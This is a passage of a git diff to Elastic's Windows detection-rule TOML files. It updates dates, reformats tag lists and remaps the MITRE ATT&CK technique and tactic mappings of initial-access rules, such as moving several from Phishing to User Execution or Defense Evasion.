Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -111,41 +104,18 @@ sequence by user.id with maxspan=2m [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" + [[rule.threat.technique.subtechnique]] id = "T1027.006" name = "HTML Smuggling" reference = "https://attack.mitre.org/techniques/T1027/006/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/initial_access_execution_from_inetcache.toml b/rules/windows/initial_access_execution_from_inetcache.toml index 1c10e770968..2d001fa4a96 100644 --- a/rules/windows/initial_access_execution_from_inetcache.toml +++ b/rules/windows/initial_access_execution_from_inetcache.toml @@ -2,7 +2,7 @@ creation_date = "2024/02/14" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -66,21 +66,7 @@ references = [ risk_score = 73 rule_id = "dca6b4b0-ae70-44eb-bb7a-ce6db502ee78" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Command and Control", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Initial Access", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -113,31 +99,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" +[[rule.threat.technique]] +id = "T1189" +name = "Drive-by Compromise" +reference = "https://attack.mitre.org/techniques/T1189/" [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/windows/initial_access_execution_from_removable_media.toml b/rules/windows/initial_access_execution_from_removable_media.toml index 839778a74ba..202f92da7e0 100644 --- a/rules/windows/initial_access_execution_from_removable_media.toml +++ b/rules/windows/initial_access_execution_from_removable_media.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/27" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -19,14 +19,7 @@ name = "Execution from a Removable Media with Network Connection" risk_score = 21 rule_id = "1542fa53-955e-4330-8e4d-b2d812adeb5f" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -80,14 +73,26 @@ Removable media, like USB drives, are often used for data transfer but can be ex [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1091" name = "Replication Through Removable Media" reference = "https://attack.mitre.org/techniques/T1091/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1091" +name = "Replication Through Removable Media" +reference = "https://attack.mitre.org/techniques/T1091/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/initial_access_execution_remote_via_msiexec.toml b/rules/windows/initial_access_execution_remote_via_msiexec.toml index 313b2343f65..63ecc9b7169 100644 --- a/rules/windows/initial_access_execution_remote_via_msiexec.toml +++ b/rules/windows/initial_access_execution_remote_via_msiexec.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/28" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -18,15 +18,7 @@ name = "Potential Remote File Execution via MSIEXEC" risk_score = 21 rule_id = "3e441bdb-596c-44fd-8628-2cfdf4516ada" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -101,36 +93,18 @@ MSIEXEC, the Windows Installer, facilitates software installation, modification, [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.007" name = "Msiexec" reference = "https://attack.mitre.org/techniques/T1218/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/initial_access_execution_via_office_addins.toml b/rules/windows/initial_access_execution_via_office_addins.toml index ce76d88f67f..4ee5330946f 100644 --- a/rules/windows/initial_access_execution_via_office_addins.toml +++ b/rules/windows/initial_access_execution_via_office_addins.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/20" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -63,19 +63,7 @@ references = [ risk_score = 47 rule_id = "ae8a142c-6a1d-4918-bea7-0b617e99ecfa" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Persistence", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -125,36 +113,36 @@ process where [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1137" name = "Office Application Startup" reference = "https://attack.mitre.org/techniques/T1137/" + [[rule.threat.technique.subtechnique]] id = "T1137.006" name = "Add-ins" reference = "https://attack.mitre.org/techniques/T1137/006/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/initial_access_exfiltration_first_time_seen_usb.toml b/rules/windows/initial_access_exfiltration_first_time_seen_usb.toml index c85bc4e1719..90fbf00b319 100644 --- a/rules/windows/initial_access_exfiltration_first_time_seen_usb.toml +++ b/rules/windows/initial_access_exfiltration_first_time_seen_usb.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/16" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -84,36 +84,6 @@ event.category:"registry" and host.os.type:"windows" and registry.value:"Friendl ''' -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1091" -name = "Replication Through Removable Media" -reference = "https://attack.mitre.org/techniques/T1091/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1052" -name = "Exfiltration Over Physical Medium" -reference = "https://attack.mitre.org/techniques/T1052/" -[[rule.threat.technique.subtechnique]] -id = "T1052.001" -name = "Exfiltration over USB" -reference = "https://attack.mitre.org/techniques/T1052/001/" - - - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - [rule.new_terms] field = "new_terms_fields" value = ["registry.path"] diff --git a/rules/windows/initial_access_exploit_jetbrains_teamcity.toml b/rules/windows/initial_access_exploit_jetbrains_teamcity.toml index 61e732cb424..51e89480805 100644 --- a/rules/windows/initial_access_exploit_jetbrains_teamcity.toml +++ b/rules/windows/initial_access_exploit_jetbrains_teamcity.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/24" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -71,20 +71,7 @@ references = [ risk_score = 47 rule_id = "730ed57d-ae0f-444f-af50-78708b57edd5" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Data Source: Elastic Endgame", - "Use Case: Vulnerability", - "Data Source: Elastic Defend", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Windows Security Event Logs", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Discovery", "Tactic: Execution", "Data Source: Elastic Endgame", "Use Case: Vulnerability", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Sysmon", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -110,22 +97,58 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + [[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" +[[rule.threat.technique]] +id = "T1057" +name = "Process Discovery" +reference = "https://attack.mitre.org/techniques/T1057/" + +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -136,10 +159,7 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/initial_access_potential_webhelpdesk_exploit.toml b/rules/windows/initial_access_potential_webhelpdesk_exploit.toml index 018003de5eb..f9db67a7a6b 100644 --- a/rules/windows/initial_access_potential_webhelpdesk_exploit.toml +++ b/rules/windows/initial_access_potential_webhelpdesk_exploit.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/02" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,15 +65,7 @@ references = [ risk_score = 73 rule_id = "a4f7a295-aba1-4382-9c00-f7b02097acbc" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Use Case: Vulnerability", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -92,14 +84,46 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" +[[rule.threat.technique]] +id = "T1129" +name = "Shared Modules" +reference = "https://attack.mitre.org/techniques/T1129/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/initial_access_rdp_file_mail_attachment.toml b/rules/windows/initial_access_rdp_file_mail_attachment.toml index f7ff84102c4..f34cb7ca06e 100644 --- a/rules/windows/initial_access_rdp_file_mail_attachment.toml +++ b/rules/windows/initial_access_rdp_file_mail_attachment.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/05" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -68,21 +68,7 @@ references = [ risk_score = 47 rule_id = "f401a0e3-5eeb-4591-969a-f435488e7d12" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Command and Control", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -100,19 +86,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/initial_access_script_executing_powershell.toml b/rules/windows/initial_access_script_executing_powershell.toml index 7ec8d133027..cfc016b1525 100644 --- a/rules/windows/initial_access_script_executing_powershell.toml +++ b/rules/windows/initial_access_script_executing_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -76,19 +76,7 @@ references = ["https://www.elastic.co/security-labs/operation-bleeding-bear"] risk_score = 21 rule_id = "f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne"] timestamp_override = "event.ingested" type = "eql" @@ -105,41 +93,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" -[[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" - - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/initial_access_scripts_process_started_via_wmi.toml b/rules/windows/initial_access_scripts_process_started_via_wmi.toml index 6846a4ea7e0..b11dbd1bfda 100644 --- a/rules/windows/initial_access_scripts_process_started_via_wmi.toml +++ b/rules/windows/initial_access_scripts_process_started_via_wmi.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/27" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -58,17 +58,7 @@ Windows Management Instrumentation (WMI) is a powerful Windows feature that allo risk_score = 47 rule_id = "b64b183e-1a76-422d-9179-7b389513e74d" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -106,23 +96,7 @@ sequence by host.id with maxspan = 5s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" @@ -132,15 +106,8 @@ reference = "https://attack.mitre.org/techniques/T1047/" id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml b/rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml index 402f26c77f3..2171b83fa7e 100644 --- a/rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml +++ b/rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/13" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/13" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -49,15 +49,7 @@ references = [ risk_score = 47 rule_id = "c3d4e5f6-a7b8-6c9d-0e1f-2a3b4c5d6e7f" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -84,34 +76,49 @@ process where host.os.type == "windows" and event.action == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1195" -name = "Supply Chain Compromise" -reference = "https://attack.mitre.org/techniques/T1195/" +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.007" +name = "Msiexec" +reference = "https://attack.mitre.org/techniques/T1218/007/" + [[rule.threat.technique.subtechnique]] -id = "T1195.002" -name = "Compromise Software Supply Chain" -reference = "https://attack.mitre.org/techniques/T1195/002/" +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + [[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" [rule.threat.tactic] id = "TA0002" diff --git a/rules/windows/initial_access_suspicious_ms_exchange_files.toml b/rules/windows/initial_access_suspicious_ms_exchange_files.toml index 519fd905a68..9ac8018570c 100644 --- a/rules/windows/initial_access_suspicious_ms_exchange_files.toml +++ b/rules/windows/initial_access_suspicious_ms_exchange_files.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/04" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] @@ -48,20 +48,7 @@ references = [ risk_score = 47 rule_id = "6cd1779c-560f-4b68-a8f1-11009b27fe63" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Lateral Movement", - "Data Source: Elastic Endgame", - "Use Case: Vulnerability", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: Elastic Endgame", "Use Case: Vulnerability", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -85,26 +72,31 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/initial_access_suspicious_ms_exchange_process.toml b/rules/windows/initial_access_suspicious_ms_exchange_process.toml index 00f178cfbd2..a19fcd489c2 100644 --- a/rules/windows/initial_access_suspicious_ms_exchange_process.toml +++ b/rules/windows/initial_access_suspicious_ms_exchange_process.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/04" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] @@ -73,22 +73,7 @@ references = [ risk_score = 47 rule_id = "483c4daf-b0c6-49e0-adf3-0bfa93231d6b" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Lateral Movement", - "Data Source: Elastic Endgame", - "Use Case: Vulnerability", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation 